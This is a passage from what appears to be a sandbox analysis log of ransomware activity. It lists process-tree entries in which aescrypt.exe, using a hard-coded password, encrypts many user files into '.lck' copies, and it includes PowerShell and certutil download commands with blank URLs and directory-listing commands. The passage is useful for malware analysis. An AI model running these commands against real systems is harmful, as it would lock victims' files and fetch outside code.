- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck" "TestOptimize.ppsx.lck"
    3⤵
    PID:4320
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck.lck" "TestOptimize.ppsx.lck.lck"
    3⤵
    PID:4348
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck.lck.lck" "TestOptimize.ppsx.lck.lck.lck"
    3⤵
    PID:4372
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck" "NewMeasure.vstx"
    3⤵
    PID:4384
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck" "NewMeasure.vstx.lck"
    3⤵
    PID:4412
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck.lck" "NewMeasure.vstx.lck.lck"
    3⤵
    PID:4436
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck.lck.lck" "NewMeasure.vstx.lck.lck.lck"
    3⤵
    PID:4448
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck" "AssertDebug.xlsm"
    3⤵
    PID:4476
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck" "AssertDebug.xlsm.lck"
    3⤵
    PID:4500
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck.lck" "AssertDebug.xlsm.lck.lck"
    3⤵
    PID:4512
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck.lck.lck" "AssertDebug.xlsm.lck.lck.lck"
    3⤵
    PID:4540
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck" "ExpandConfirm.dotx"
    3⤵
    PID:4564
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck" "ExpandConfirm.dotx.lck"
    3⤵
    PID:4576
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck.lck" "ExpandConfirm.dotx.lck.lck"
    3⤵
    PID:4604
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck.lck.lck" "ExpandConfirm.dotx.lck.lck.lck"
    3⤵
    PID:4624
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck" "StartProtect.wps"
    3⤵
    PID:4640
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck" "StartProtect.wps.lck"
    3⤵
    PID:4668
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck.lck" "StartProtect.wps.lck.lck"
    3⤵
    PID:4692
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck.lck.lck" "StartProtect.wps.lck.lck.lck"
    3⤵
    PID:4704
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck" "RenameCompare.mpp"
    3⤵
    PID:4720
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck" "RenameCompare.mpp.lck"
    3⤵
    PID:4748
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck.lck" "RenameCompare.mpp.lck.lck"
    3⤵
    PID:4772
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck.lck.lck" "RenameCompare.mpp.lck.lck.lck"
    3⤵
    PID:4784
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck" "StartInitialize.pub"
    3⤵
    PID:4812
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck" "StartInitialize.pub.lck"
    3⤵
    PID:4828
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck.lck" "StartInitialize.pub.lck.lck"
    3⤵
    PID:4852
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck.lck.lck" "StartInitialize.pub.lck.lck.lck"
    3⤵
    PID:4876
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck" "DenyBackup.vstm"
    3⤵
    PID:4900
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck" "DenyBackup.vstm.lck"
    3⤵
    PID:4916
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck.lck" "DenyBackup.vstm.lck.lck"
    3⤵
    PID:4944
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck.lck.lck" "DenyBackup.vstm.lck.lck.lck"
    3⤵
    PID:4972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4100
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4380
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:4404
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "WriteAdd.pptx.lck" "WriteAdd.pptx"
    3⤵
    PID:4416
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SelectReset.ADT.lck" "SelectReset.ADT"
    3⤵
    PID:4460
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InitializeRestart.rar.lck" "InitializeRestart.rar"
    3⤵
    PID:4484
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SaveSkip.mp2.lck" "SaveSkip.mp2"
    3⤵
    PID:4496
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GrantConvert.wvx.lck" "GrantConvert.wvx"
    3⤵
    PID:4524
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertGrant.M2TS.lck" "AssertGrant.M2TS"
    3⤵
    PID:4548
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertUnprotect.emf.lck" "AssertUnprotect.emf"
    3⤵
    PID:4580
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UnpublishUnregister.wps.lck" "UnpublishUnregister.wps"
    3⤵
    PID:4592
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RegisterSend.mpeg.lck" "RegisterSend.mpeg"
    3⤵
    PID:4620
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "JoinEnable.edrwx.lck" "JoinEnable.edrwx"
    3⤵
    PID:4656
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResetGet.edrwx.lck" "ResetGet.edrwx"
    3⤵
    PID:4672
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SaveRequest.asx.lck" "SaveRequest.asx"
    3⤵
    PID:4764
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BlockSend.ps1.lck" "BlockSend.ps1"
    3⤵
    PID:4800
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncComplete.txt.lck" "SyncComplete.txt"
    3⤵
    PID:4816
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartResume.kix.lck" "StartResume.kix"
    3⤵
    PID:4836
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UseMeasure.edrwx.lck" "UseMeasure.edrwx"
    3⤵
    PID:4864
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ConvertFromGroup.tif.lck" "ConvertFromGroup.tif"
    3⤵
    PID:4888
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RegisterStart.mpg.lck" "RegisterStart.mpg"
    3⤵
    PID:4964
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "WaitRead.xml.lck" "WaitRead.xml"
    3⤵
    PID:2888
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MeasureInitialize.mid.lck" "MeasureInitialize.mid"
    3⤵
    PID:4980
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StopEdit.otf.lck" "StopEdit.otf"
    3⤵
    PID:184
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishUndo.vb.lck" "PublishUndo.vb"
    3⤵
    PID:2288
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeJoin.ADTS.lck" "ResizeJoin.ADTS"
    3⤵
    PID:5096
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StepGet.avi.lck" "StepGet.avi"
    3⤵
    PID:5032
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InvokePop.ppsx.lck" "InvokePop.ppsx"
    3⤵
    PID:5020
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DisableRestart.vbe.lck" "DisableRestart.vbe"
    3⤵
    PID:5064
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CheckpointSkip.dwg.lck" "CheckpointSkip.dwg"
    3⤵
    PID:4260
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendUninstall.potx.lck" "SendUninstall.potx"
    3⤵
    PID:4212
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InitializeApprove.vbs.lck" "InitializeApprove.vbs"
    3⤵
    PID:4132
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandEdit.vstm.lck" "ExpandEdit.vstm"
    3⤵
    PID:4420
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectRegister.php.lck" "ProtectRegister.php"
    3⤵
    PID:4464
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "WriteWait.jpeg.lck" "WriteWait.jpeg"
    3⤵
    PID:4528
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectLimit.ppsm.lck" "ProtectLimit.ppsm"
    3⤵
    PID:4572
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CheckpointRepair.wm.lck" "CheckpointRepair.wm"
    3⤵
    PID:368
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestSearch.ico.lck" "TestSearch.ico"
    3⤵
    PID:4956
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ImportRename.cab.lck" "ImportRename.cab"
    3⤵
    PID:3060
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveRevoke.m3u.lck" "MoveRevoke.m3u"
    3⤵
    PID:3112
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CloseDisconnect.bmp.lck" "CloseDisconnect.bmp"
    3⤵
    PID:3212
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishUpdate.iso.lck" "PublishUpdate.iso"
    3⤵
    PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:4336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    PID:3456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    PID:3916
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:3460
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:4444
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
    3⤵
    PID:4428
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck" "ResizeUndo.svgz"
    3⤵
    PID:3912
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck" "BackupImport.dxf"
    3⤵
    PID:3368
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck" "SyncDisable.gif"
    3⤵
    PID:3700
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck" "PublishClose.emf"
    3⤵
    PID:3708
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck" "ReadSuspend.ico"
    3⤵
    PID:3584
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck" "EditPublish.jpg"
    3⤵
    PID:3944
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck" "SendSearch.tif"
    3⤵
    - Modifies extensions of user files
    PID:4596
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck" "MoveTest.dib"
    3⤵
    PID:2388
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck" "ProtectUndo.emz"
    3⤵
    PID:4336
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck" "GetPublish.gif"
    3⤵
    PID:3592
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck" "PublishStep.svgz"
    3⤵
    PID:3264
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck" "ResumeRequest.wmf"
    3⤵
    PID:3312
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck" "OptimizeMeasure.dib"
    3⤵
    PID:3280
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck" "DenyPing.pcx"
    3⤵
    PID:3364
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck" "SwitchRedo.svg"
    3⤵
    PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4124
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:3756
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
